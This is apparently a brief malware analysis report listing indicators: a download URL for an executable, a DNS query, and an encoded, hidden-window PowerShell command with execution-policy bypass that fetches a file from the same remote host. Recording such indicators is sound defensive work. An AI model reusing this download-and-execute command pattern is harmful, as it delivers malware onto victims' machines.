Technical Information
- http://www.fluidsystems.ml/p1/pa_001.exe as %temp%\pa_001.exe
- DNS ASK fl###systems.ml
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGYAbAB1...' (with hidden window)